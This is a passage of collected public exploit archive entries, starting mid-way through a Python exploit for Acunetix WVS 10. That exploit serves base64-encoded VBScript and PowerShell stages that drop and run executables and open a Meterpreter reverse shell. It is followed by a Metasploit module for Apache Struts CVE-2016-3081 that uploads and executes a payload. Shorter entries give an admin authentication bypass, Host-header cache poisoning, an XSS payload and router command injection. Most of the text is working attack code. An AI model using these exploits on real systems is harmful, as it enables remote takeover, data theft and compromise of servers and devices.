"zMHB4IHNvbGlkIHRyYW5zcGFyZW50Ow0KICBib3JkZXItcmlnaHQ6IDMwcHggc29saWQgdHJhbnNwYXJlbnQ7DQogIGJvdHRvbTogLT" \
"E4MHB4Ow0KICBib3gtc2hhZG93OiAwcHggNHB4IDBweCAjN2U3ZTdlDQp9DQoNCi5pbm5lci1zY3JlZW57DQogIHdpZHRoOiA4MDBwe" \
"DsNCiAgaGVpZ2h0OiAzNDBweDsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCiAgbWFyZ2luOiAwcHggYXV0bzsNCiAgcGFkZGluZy10" \
"b3A6IDgwcHg7DQp9DQoNCi5mb3Jtew0KICB3aWR0aDogNDAwcHg7DQogIGhlaWdodDogMjMwcHg7DQogIGJhY2tncm91bmQ6ICNlZGV" \
"mZjE7DQogIG1hcmdpbjogMHB4IGF1dG87DQogIHBhZGRpbmctdG9wOiAyMHB4Ow0KICBib3JkZXItcmFkaXVzOiAxMHB4Ow0KICAtbW" \
"96LWJvcmRlci1yYWRpdXM6IDEwcHg7DQogIC13ZWJraXQtYm9yZGVyLXJhZGl1czogMTBweDsNCn0NCg0KaW5wdXRbdHlwZT0idGV4d" \
"CJdew0KICBkaXNwbGF5OiBibG9jazsNCiAgd2lkdGg6IDMwOXB4Ow0KICBoZWlnaHQ6IDM1cHg7DQogIG1hcmdpbjogMTVweCBhdXRv" \
"Ow0KICBiYWNrZ3JvdW5kOiAjZmZmOw0KICBib3JkZXI6IDBweDsNCiAgcGFkZGluZzogNXB4Ow0KICBmb250LXNpemU6IDE2cHg7DQo" \
"gICBib3JkZXI6IDJweCBzb2xpZCAjZmZmOw0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KICBib3JkZXItcmFkaXVzOiA1cH" \
"g7DQogIC1tb3otYm9yZGVyLXJhZGl1czogNXB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDVweDsNCn0NCg0KaW5wdXRbdHlwZ" \
"T0idGV4dCJdOmZvY3Vzew0KICBib3JkZXI6IDJweCBzb2xpZCAjMWFiYzlkDQp9DQoNCmlucHV0W3R5cGU9InN1Ym1pdCJdew0KICBk" \
"aXNwbGF5OiBibG9jazsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCiAgd2lkdGg6IDMxNHB4Ow0KICBwYWRkaW5nOiAxMnB4Ow0KICB" \
"jdXJzb3I6IHBvaW50ZXI7DQogIGNvbG9yOiAjZmZmOw0KICBib3JkZXI6IDBweDsNCiAgbWFyZ2luOiBhdXRvOw0KICBib3JkZXItcm" \
"FkaXVzOiA1cHg7DQogIC1tb3otYm9yZGVyLXJhZGl1czogNXB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDVweDsNCiAgZm9u" \
"dC1zaXplOiAxN3B4Ow0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KfQ0KDQppbnB1dFt0eXBlPSJzdWJtaXQiXTpob3ZlcnsN" \
"CiAgYmFja2dyb3VuZDogIzA5Y2NhNg0KfQ0KDQphew0KICB0ZXh0LWFsaWduOiBjZW50ZXI7DQogIGZvbnQtZmFtaWx5OiBBcmlhbDs" \
"NCiAgY29sb3I6IGdyYXk7DQogIGRpc3BsYXk6IGJsb2NrOw0KICBtYXJnaW46IDE1cHggYXV0bzsNCiAgdGV4dC1kZWNvcmF0aW9uOi" \
"Bub25lOw0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KICBmb250LXNpemU6IDEycHg7DQp9DQoNCmE6aG92ZXJ7DQogIGNvb" \
"G9yOiAjMWFiYzlkOw0KfQ0KDQoNCjo6LXdlYmtpdC1pbnB1dC1wbGFjZWhvbGRlciB7DQogICBjb2xvcjogZ3JheTsNCn0NCg0KOi1" \
"tb3otcGxhY2Vob2xkZXIgeyAvKiBGaXJlZm94IDE4LSAqLw0KICAgY29sb3I6IGdyYXk7ICANCn0NCg0KOjotbW96LXBsYWNlaG9sZG" \
"VyIHsgIC8qIEZpcmVmb3ggMTkrICovDQogICBjb2xvcjogZ3JheTsgIA0KfQ0KDQo6LW1zLWlucHV0LXBsYWNlaG9sZGVyIHsgIA0KI" \
"CAgY29sb3I6IGdyYXk7ICANCn0NCjwvc3R5bGU+DQo8aDE+QWRtaW4gcGFuZWw8L2gxPg0KPGRpdiBjbGFzcz0ic3RhbmQiPg0KICA8" \
"ZGl2IGNsYXNzPSJvdXRlci1zY3JlZW4iPg0KICAgIDxkaXYgY2xhc3M9ImlubmVyLXNjcmVlbiI+DQogICAgICA8ZGl2IGNsYXNzPSJ" \
"mb3JtIj4NCiAgICAgIDxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIvbG9naW4iPg0KICAgICAgICA8aW5wdXQgdHlwZT0idGV4dC" \
"IgbmFtZT0idXNyIiBwbGFjZWhvbGRlcj0iVXNlcm5hbWUiIC8+DQogICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwd2QiI" \
"HBsYWNlaG9sZGVyPSJQYXNzd29yZCIgLz4NCiAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJMb2dpbiIgLz4NCiAg" \
"ICAgICAgIDwvZm9ybT4NCiAgICAgICAgPGEgaHJlZj0iL2ZvcmdvdCI+TG9zdCB5b3VyIHBhc3N3b3JkPzwvYT4NCiAgICAgIDwvZGl" \
"2PiANCiAgICA8L2Rpdj4gDQogIDwvZGl2PiANCjwvZGl2Pg=="
# param NO
EXPLOIT_STAGE_2 = "U2V0IGZzbyA9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiKQ0KRnVuY3Rpb24gRXNjYWxhdGVBbm" \
"RFeGVjdXRlKCkNCiAgYmluZCA9ICJTZXQgb2JqID0gQ3JlYXRlT2JqZWN0KCIiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q" \
"iIikiICYgdmJjcmxmICZfDQogICJvYmouRGVsZXRlRmlsZSgiIkM6XFByb2dyYW1EYXRhXEFjdW5ldGl4IFdWUyAxMFxEYXRhX" \
"FNjcmlwdHNcUGVyU2VydmVyXEFKUF9BdWRpdC5zY3JpcHQiIikiICYgdmJjcmxmICZfDQogICAib2JqLk1vdmVGaWxlICIiQzp" \
"cUHJvZ3JhbURhdGFcQWN1bmV0aXggV1ZTIDEwXERhdGFcU2NyaXB0c1xQZXJTZXJ2ZXJcQUpQX0F1ZGl0LnNjcmlwdC5iYWsiI" \
"iwgIiJDOlxQcm9ncmFtRGF0YVxBY3VuZXRpeCBXVlMgMTBcRGF0YVxTY3JpcHRzXFBlclNlcnZlclxBSlBfQXVkaXQuc2NyaXB" \
"0IiIgIiAmIHZiY3JsZiAmXw0KICAiRnVuY3Rpb24gUkVPbnJZSmUoKSIgJiB2YmNybGYgJl8NCiAgIk5tU1ROUFVyb0lLdFRxID" \
"0gIiIlcyIiIiAmIHZiY3JsZiAmXw0KICAiRGltIGdVdERzem1uR050IiAmIHZiQ3JsZiAmXw0KICAiU2V0IGdVdERzem1uR050I" \
"D0gQ3JlYXRlT2JqZWN0KCIiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiIikiICYgdmJjcmxmICZfDQogICJEaW0gaE1XRkN" \
"6dUciICYgdmJjcmxmICZfDQogICJEaW0gZXJtbVRDalJ4SWpjWEciICYgdmJjcmxmICZfDQogICJEaW0ga0xrdVdOYnhuTFVIe" \
"HR6IiAmIHZiY3JsZiAmXw0KICAiRGltIHJDUWNUekFBalJ4dSIgJiB2YmNybGYgJl8NCiAgIlNldCBlcm1tVENqUnhJamNYRyA" \
"9IGdVdERzem1uR050LkdldFNwZWNpYWxGb2xkZXIoMikiICYgdmJjcmxmICZfDQogICJyQ1FjVHpBQWpSeHUgPSBlcm1tVENqU" \
"nhJamNYRyAmICIiXCIiICYgZ1V0RHN6bW5HTnQuR2V0VGVtcE5hbWUoKSIgJiB2YmNybGYgJl8NCiAgImdVdERzem1uR050LkN" \
"yZWF0ZUZvbGRlcihyQ1FjVHpBQWpSeHUpIiAmIHZiY3JsZiAmXw0KICAia0xrdVdOYnhuTFVIeHR6ID0gckNRY1R6QUFqUnh1I" \
"CYgIiJcIiIgJiAiIk5ObWxmVmhqYld3emNqLmV4ZSIiIiAmIHZiY3JsZiAmXw0KICAiU2V0IGhNV0ZDenVHID0gZ1V0RHN6bW5" \
"HTnQuQ3JlYXRlVGV4dEZpbGUoa0xrdVdOYnhuTFVIeHR6LCB0cnVlICwgZmFsc2UpICIgJiB2YmNybGYgJl8NCiAgIkZvciBpI" \
"D0gMSB0byBMZW4oTm1TVE5QVXJvSUt0VHEpIFN0ZXAgMiIgJiB2YmNybGYgJl8NCiAgIiAgICBoTVdGQ3p1Ry5Xcml0ZSBDaHI" \
"oQ0xuZygiIiZIIiIgJiBNaWQoTm1TVE5QVXJvSUt0VHEsaSwyKSkpIiAmIHZiY3JsZiAmXw0KICAiTmV4dCIgJiB2YmNybGYgJ" \
"l8NCiAgImhNV0ZDenVHLkNsb3NlIiAmIHZiY3JsZiAmXw0KICAiRGltIHlFU3pGdUlNb211IiAmIHZiY3JsZiAmXw0KICAiU2V" \
"0IHlFU3pGdUlNb211ID0gQ3JlYXRlT2JqZWN0KCIiV3NjcmlwdC5TaGVsbCIiKSIgJiB2YmNybGYgJl8NCiAgInlFU3pGdUlNb" \
"211LnJ1biBrTGt1V05ieG5MVUh4dHoiICYgdmJjcmxmICZfDQogICInZ1V0RHN6bW5HTnQuRGVsZXRlRmlsZShrTGt1V05ieG5" \
"MVUh4dHopIiAmIHZiY3JsZiAmXw0KICAiJ2dVdERzem1uR050LkRlbGV0ZUZvbGRlcihyQ1FjVHpBQWpSeHUpIiAmIHZiY3JsZ" \
"iAmXw0KIkVuZCBGdW5jdGlvbiIgJiB2YmNybGYgJl8NCiJSRU9ucllKZSIgJiB2YmNybGYgJl8NCiJDcmVhdGVPYmplY3QoIiJ" \
"TY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCIiKS5EZWxldGVGaWxlIFdTY3JpcHQuU2NyaXB0RnVsbE5hbWUiICYgdmJjcmxmI" \
"CZfDQoiV1NjcmlwdC5RdWl0Ig0KICBjd2QgPSBDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5FeHBhbmRFbnZpcm9ubWV" \
"udFN0cmluZ3MoIiVzIikgJiAiXHN0YWdlbGFzdC52YnMiDQogIFNldCBvYmpGaWxlQmluZCA9IGZzby5DcmVhdGVUZXh0RmlsZS" \
"hjd2QgLFRydWUpDQogIG9iakZpbGVCaW5kLldyaXRlIGJpbmQgJiB2YkNyTGYNCiAgb2JqRmlsZUJpbmQuQ2xvc2UNCiAgDQog" \
"IGpzID0gInZhciBzaGVsbCA9IG5ldyBBY3RpdmVYT2JqZWN0KCIiV1NjcmlwdC5TaGVsbCIiKTsiJiB2YmNybGYgJiAic2hlbG" \
"wucnVuKCdjbWQgL0Mgc3RhcnQgL0IgIiIiIiAiInBvd2Vyc2hlbGwiIiAtd2luZG93c3R5bGUgaGlkZGVuIC1jb21tYW5kICIi" \
"d3NjcmlwdCAiICYgUmVwbGFjZShjd2QsIlwiLCJcXCIpICYgIiIiJyk7Ig0KICBmc28uTW92ZUZpbGUgIkM6XFByb2dyYW1EYX" \
"RhXEFjdW5ldGl4IFdWUyAxMFxEYXRhXFNjcmlwdHNcUGVyU2VydmVyXEFKUF9BdWRpdC5zY3JpcHQiLCAiQzpcUHJvZ3JhbURh" \
"dGFcQWN1bmV0aXggV1ZTIDEwXERhdGFcU2NyaXB0c1xQZXJTZXJ2ZXJcQUpQX0F1ZGl0LnNjcmlwdC5iYWsiDQogIFNldCBvYm" \
"pGaWxlID0gZnNvLkNyZWF0ZVRleHRGaWxlKCJDOlxQcm9ncmFtRGF0YVxBY3VuZXRpeCBXVlMgMTBcRGF0YVxTY3JpcHRzXFBl" \
"clNlcnZlclxBSlBfQXVkaXQuc2NyaXB0IixUcnVlKQ0KICBvYmpGaWxlLldyaXRlIGpzICYgdmJDckxmDQogIG9iakZpbGUuQ2" \
"xvc2UNCiAgeSA9IE1vbnRoKE5vdykgJiAiLyIgJiBEYXkoTm93KSAmICIvIiAmIFllYXIoTm93KQ0KICBoID0gSG91cihOb3cp" \
"ICYgIjoiJiBNaW51dGUoTm93KSsxDQogIHNSZXF1ZXN0ID0gInsiInNjYW5UeXBlIiI6IiJzY2FuIiIsIiJ0YXJnZXRMaXN0Ii" \
"I6IiIiIiwiInRhcmdldCIiOlsiImh0dHA6Ly93d3cuZ29vZ2xlLml0IiJdLCIicmVjdXJzZSIiOiIiLTEiIiwiImRhdGUiIjoi" \
"IiIgJiB5ICYgIiIiLCIiZGF5T2ZXZWVrIiI6IiIxIiIsIiJkYXlPZk1vbnRoIiI6IiIxIiIsIiJ0aW1lIiI6IiIiICYgaCAmIC" \
"IiIiwiImRlbGV0ZUFmdGVyQ29tcGxldGlvbiIiOiIiRmFsc2UiIiwiInBhcmFtcyIiOnsiInByb2ZpbGUiIjoiIkRlZmF1bHQi" \
"IiwiImxvZ2luU2VxIiI6IiI8bm9uZT4iIiwiInNldHRpbmdzIiI6IiJEZWZhdWx0IiIsIiJzY2FubmluZ21vZGUiIjoiImhldX" \
"Jpc3RpYyIiLCIiZXhjbHVkZWRob3VycyIiOiIiPG5vbmU+IiIsIiJzYXZldG9kYXRhYmFzZSIiOiIiVHJ1ZSIiLCIic2F2ZWxv" \
"Z3MiIjoiIkZhbHNlIiIsIiJnZW5lcmF0ZXJlcG9ydCIiOiIiRmFsc2UiIiwiInJlcG9ydGZvcm1hdCIiOiIiUERGIiIsIiJyZX" \
"BvcnR0ZW1wbGF0ZSIiOiIiV1ZTRGV2ZWxvcGVyUmVwb3J0LnJlcCIiLCIiZW1haWxhZGRyZXNzIiI6IiIiIn19Ig0KICBzZXQg" \
"b0hUVFAgPSBDcmVhdGVPYmplY3QoIk1pY3Jvc29mdC5YTUxIVFRQIikNCiAgb0hUVFAub3BlbiAiUE9TVCIsICJodHRwOi8vMT" \
"I3LjAuMC4xOjgxODMvYXBpL2FkZFNjYW4iLCBmYWxzZQ0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJDb250ZW50LVR5cGUi" \
"LCAiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIg0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJYLVJlcXVlc3" \
"RlZC1XaXRoIiwgIlhNTEh0dHBSZXF1ZXN0Ig0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJBY2NlcHQiLCAiYXBwbGljYXRp" \
"b24vanNvbiwgdGV4dC9qYXZhc2NyaXB0LCAqLyo7IHE9MC4wMSINCiAgb0hUVFAuc2V0UmVxdWVzdEhlYWRlciAiQ29udGVudC" \
"1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb247IGNoYXJzZXQ9VVRGLTgiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIlJlcXVl" \
"c3RWYWxpZGF0ZWQiLCAgInRydWUiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtTGVuZ3RoIiwgTGVuKHNSZX" \
"F1ZXN0KQ0KICBvSFRUUC5zZW5kIHNSZXF1ZXN0DQogRW5kIEZ1bmN0aW9uDQogDQogRXNjYWxhdGVBbmRFeGVjdXRlDQogZnNv" \
"LkRlbGV0ZUZpbGUgV1NjcmlwdC5TY3JpcHRGdWxsTmFtZQ0KIFdTY3JpcHQuUXVpdA=="
class myHandler(BaseHTTPRequestHandler):
timeout = 5
server_version = "Apache"
sys_version = "1.2"
def log_message(self, format, *args):
try:
paths = str(list(args)[0])
if "prompt" in paths or "confirm" in paths or "alert" in paths:
print "[*] Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (%s) bytes !" % \
(len(PAYLOAD_DOWNLOAD_EXEC) + len(EXPLOIT_STAGE_1))
if "stage2" in paths:
print "[*] Triggering EXPLOIT_STAGE_2 sending (%s) bytes !" % len(EXPLOIT_STAGE_2)
return
except:
pass
return
def do_POST(self):
PDE = base64.b64decode(PAYLOAD_DOWNLOAD_EXEC) % (sys.argv[2] + ":" + sys.argv[1],
"%TEMP%", gen_random_name(12))
data = self.rfile.read(int(self.headers.getheader("Content-Length")))
data = data.split("&")
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
for param in data:
if "usr" in param:
param = param.split("=")[1]
self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
% (base64.b64encode("".join(x + "\x00" for x in PDE)),
("Bad password for user %s , <a href=\"/\">try again</a>." % param)))
return
self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
% (base64.b64encode("".join(x + "\x00" for x in PDE)),
"Some data are missing , <a href=\"/\">try again</a>."))
return
def do_GET(self):
try:
if self.path == "/":
self.send_response(302)
self.send_header('Content-type', 'text/html')
self.send_header('Location', "login")
self.end_headers()
# Send the html message
self.wfile.write("<a href='/?url=test'>Here</a>")
return
elif self.path == "/stage2":
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
# Send the html message
self.wfile.write(base64.b64decode(EXPLOIT_STAGE_2)
% (PAYLOAD_METERPETRER % ip2b(sys.argv[2]), "%TEMP%"))
postexpthread = Thread(target=postexploitation, args=(self.client_address[0], ))
postexpthread.start()
return
else:
string = ""
try:
string = self.path.split("=")[1]
except:
pass
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
# Send the html message
PDE = base64.b64decode(PAYLOAD_DOWNLOAD_EXEC) % (sys.argv[2] + ":" + sys.argv[1],
"%TEMP%", gen_random_name(12))
self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
% (base64.b64encode("".join(x + "\x00" for x in PDE)), base64.b64decode(LOGIN_FORM)))
return
except Exception as e:
print e.message
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write("")
return
if __name__ == "__main__":
print "\n\nAcunetix WVS 10 - SYSTEM Remote Command Execution (Daniele Linguaglossa)\n" \
"Payload: Meterpreter reverse TCP 4444"
try:
if len(sys.argv) > 2:
# Create a web server and define the handler to manage the
# incoming request
server = HTTPServer(('0.0.0.0', int(sys.argv[1])), myHandler)
print 'Exploit started on port *:%s' % sys.argv[1]
print '[+] Waiting for scanner...'
# Wait forever for incoming http requests
server.serve_forever()
else:
print "Usage: %s <port> <local ip/domain name>" % os.path.basename(sys.argv[0])
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts Dynamic Method Invocation Remote Code Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache Struts
version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code
Execution can be performed via method: prefix when Dynamic Method Invocation
is enabled.
},
'Author' => [ 'Nixawk' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-3081' ],
[ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ]
],
'Platform' => %w{ linux },
'Privileged' => true,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp_uuid'
},
'Targets' =>
[
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'DisclosureDate' => 'Apr 27 2016',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),
OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil])
], self.class)
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def send_http_request(payload)
uri = normalize_uri(datastore['TARGETURI'])
res = send_request_cgi(
'uri' => "#{uri}#{payload}",
'method' => 'POST')
if res && res.code == 404
fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
end
res
end
def parameterize(params) # params is a hash
URI.escape(params.collect { |k, v| "#{k}=#{v}" }.join('&'))
end
def generate_rce_payload(code, params_hash)
payload = "?method:"
payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
payload << ","
payload << Rex::Text.uri_encode(code)
payload << ","
payload << Rex::Text.uri_encode("1?#xx:#request.toString")
payload << "&"
payload << parameterize(params_hash)
payload
end
def temp_path
@TMPPATH ||= lambda {
path = datastore['TMPPATH']
return nil unless path
unless path.end_with?('/')
path << '/'
end
return path
}.call
end
def upload_file(filename, content)
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
var_c = rand_text_alpha_lower(4)
var_d = rand_text_alpha_lower(4)
code = "##{var_a}=new sun.misc.BASE64Decoder(),"
code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_c}[0]))),"
code << "##{var_b}.write(##{var_a}.decodeBuffer(#parameters.#{var_d}[0])),"
code << "##{var_b}.close()"
params_hash = { var_c => filename, var_d => content }
payload = generate_rce_payload(code, params_hash)
send_http_request(payload)
end
def execute_command(cmd)
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
var_c = rand_text_alpha_lower(4)
var_d = rand_text_alpha_lower(4)
var_e = rand_text_alpha_lower(4)
var_f = rand_text_alpha_lower(4)
code = "##{var_a}=@java.lang.Runtime@getRuntime().exec(#parameters.#{var_f}[0]).getInputStream(),"
code << "##{var_b}=new java.io.InputStreamReader(##{var_a}),"
code << "##{var_c}=new java.io.BufferedReader(##{var_b}),"
code << "##{var_d}=new char[1024],"
code << "##{var_c}.read(##{var_d}),"
code << "##{var_e}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
code << "##{var_e}.println(##{var_d}),"
code << "##{var_e}.close()"
cmd.tr!(' ', '+') if cmd && cmd.include?(' ')
params_hash = { var_f => cmd }
payload = generate_rce_payload(code, params_hash)
send_http_request(payload)
end
def linux_stager
payload_exe = rand_text_alphanumeric(4 + rand(4))
path = temp_path || '/tmp/'
payload_exe = "#{path}#{payload_exe}"
b64_filename = Rex::Text.encode_base64(payload_exe)
b64_content = Rex::Text.encode_base64(generate_payload_exe)
print_status("Uploading exploit to #{payload_exe}")
upload_file(b64_filename, b64_content)
print_status("Attempting to execute the payload...")
execute_command("chmod 700 #{payload_exe}")
execute_command("/bin/sh -c #{payload_exe}")
end
def exploit
linux_stager
end
def check
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
flag = Rex::Text.rand_text_alpha(5)
code = "##{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
code << "##{var_a}.print(#parameters.#{var_b}[0]),"
code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two})),"
code << "##{var_a}.print(#parameters.#{var_b}[0]),"
code << "##{var_a}.close()"
params_hash = { var_b => flag }
payload = generate_rce_payload(code, params_hash)
begin
resp = send_http_request(payload)
rescue Msf::Exploit::Failed
return Exploit::CheckCode::Unknown
end
if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}")
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
end
Sources:
https://bits-please.blogspot.ca/2016/05/qsee-privilege-escalation-vulnerability.html
https://github.com/laginimaineb/cve-2015-6639
Qualcomm's Secure Execution Environment (QSEE) Privilege Escalation Exploit using PRDiag* commands (CVE-2015-6639)
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39757.zip
# Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass
# Date: 2016-05-03
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://alibaba-clone.com/
# Version: All Versions
Exploit :
For enter , simply enter the following code
http://server/admin/adminhome.php?tmp=1
For each page is enough to add the following code to the end of url
example see page members :
http://server/admin/members.php?tmp=1
or add a new news :
http://server/admin/hot_news_menu.php?tmp=1
or edit news :
http://server/admin/edit_hot_news.php?hotnewsid=44&tmp=1
=============================================
Web Server Cache Poisoning in CMS Made Simple
=============================================
CVE-2016-2784
Product Description
===================
CMS Made Simple is a great tool with many plugins to publish content on the Web. It aims to
be simple to use by end users and to provide a secure and robust website.
Website: http://www.cmsmadesimple.org/
Description
===========
A remote unauthenticated attacker can insert malicious content in a CMS Made Simple
installation by poisoning the web server cache when Smarty Cache is activated by modifying
the Host HTTP Header in his request.
The vulnerability can be triggered only if the Host header is not part of the web server
routing process (e.g. if several domains are served by the same web server).
This can lead to phishing attacks because of the modification of the site's links,
defacement or Cross-Site-Scripting attacks by a lack of filtering of HTML entities in
$_SERVER variable.
**Access Vector**: remote
**Security Risk**: medium
**Vulnerability**: CWE-20
**CVSS Base score**: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
----------------
Proof of Concept
----------------
Request that shows improper HTML entities filtering and will insert
' onload='javacript:alert(Xss) in the pages :
GET / HTTP/1.1
Host: ' onload='javascrscript:ipt:alert(Xss)
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Request that changes the root domain for all links and allows to redirect to external
websites :
GET / HTTP/1.1
Host: www.malicious.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Solution
========
Use the variable $_SERVER['SERVER_NAME'] instead of the variable $_SERVER['HTTP_HOST']
given that the server name is correctly defined or use an application specific
constant.
Fixes
=====
Upgrade to CMS Made Simple 2.1.3 or 1.12.2.
See http://www.cmsmadesimple.org/2016/03/Announcing-CMSMS-1-12-2-kolonia and
http://www.cmsmadesimple.org/2016/04/Announcing-CMSMS-2-1-3-Black-Point for upgrade
instructions.
Mitigation : disable Smarty caching in the admin panel.
Affected Versions
=================
CMS Made Simple < 2.1.3 and < 1.12.2
Vulnerability Disclosure Timeline
=================================
02-24-2016: Vendor contacted
02-24-2016: Vulnerability confirmed by the vendor
03-01-2016: CVE identifier assigned
03-28-2016 & 04-16-2016: Vendor patch release
05-03-2016: Public Disclosure
Credits
=======
* Mickaël Walter, I-Tracing (lab -at- i-tracing -dot- com)
Website: http://www.i-tracing.com/
1. Introduction
# Exploit Title: Acunetix WP Security 3.0.3 XSS
# Date: May.03.2016
# Exploit Author: Johto Robbie
# Facebook: https://www.facebook.com/johto.robbie
# Vendor: VN Hacker News
# Tested On: Apache 2.4.17 / PHP 5.6.16 / Windows 10 / WordPress 4.5.1
# Category: Webapps
# Software Link:
http://localhost:8888/wordpress/wp-admin/admin.php?page=swpa_live_traffic
2. Descryption:
I have to insert scripts into the content search wordpress. The result is
that it is logging in Acunetix Secure WordPress. Taking advantage of this,
I have exploited XSS vulnerability
<span class="w-entry"><a
href="http://localhost:8888/wordpress/?s="><script>alert("Johto.Robbie"</script>"
target="_blank" title="Opens in a new tab">
http://localhost:8888/wordpress/?s=
"><script>alert("Johto.Robbie"</script></a></span>
Video Demonstration:
https://www.youtube.com/watch?v=L8t3_HGriP8&feature=youtu.be
3. Report Timeline
02-05-2016 : Discovered
02-05-2016 : Vendor notified
4. Solution
Update to version 4.5.1
Title:
====
NetCommWireless HSPA 3G10WVE Wireless Router – Multiple vulnerabilities
Credit:
======
Name: Bhadresh Patel
Company/affiliation: HelpAG
Website: www.helpag.com
CVE:
=====
CVE-2015-6023, CVE-2015-6024
Date:
====
03-05-2016 (dd/mm/yyyy)
Vendor:
======
NetComm Wireless is a leading developer and supplier of high performance
communication devices that connect businesses and people to the internet.
Products and services:
Wireless 3G/4G broadband devices
Custom engineered technologies
Broadband communication devices
Customers:
Telecommunications carriers
Internet Service Providers
System Integrators
Channel partners
Enterprise customers
Product:
=======
HSPA 3G10WVE is a wireless router
It integrates a wireless LAN, HSPA module and voice gateway into one
stylish unit. Insert an active HSPA SIM Card into the slot on the rear
panel & get instant access to 3G internet connection. Etisalat HSPA
3G10WVE wireless router incorporates a WLAN 802.11b/g access point, two
Ethernet 10/100Mbps ports for voice & fax. Featuring voice port which
means that one can stay connected using the internet & phone. If one
need a flexible internet connection for his business or at home; this is
the perfect solution.
Customer Product link: http://www.etisalat.ae/nrd/en/generic/3.5g_router.jsp
Abstract:
=======
Multiple vulnerabilities in the HSPA 3G10WVE wireless router enable an
anonymous unauthorized attacker to 1) bypass authentication and gain
unauthorized access of router's network troubleshooting page (ping.cgi)
and 2) exploit a command injection vulnerability on ping.cgi, which
could result in a complete system/network compromise.
Report-Timeline:
============
03-09-2015: Vendor notification
08-09-2015: Vendor Response/Feedback
02-05-2016: Vendor Fix/Patch
03-05-2016: Public Disclosure
Affected Software Version:
=============
3G10WVE-L101-S306ETS-C01_R03
Exploitation-Technique:
===================
Remote
Severity Rating (CVSS):
===================
10.0 (Critical) (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Details:
=======
Below listed vulnerabilities enable an anonymous unauthorized attacker
to gain access of network troubleshooting page (ping.cgi) on wireless
router and inject commands to compromise full system/network.
1) Bypass authentication and gain unauthorized access vulnerability -
CVE-2015-6023
2) Command injection vulnerability - CVE-2016-6024
Vulnerable module/page/application: ping.cgi
Vulnerable parameter: DIA_IPADDRESS
Proof Of Concept:
================
PoC URL:
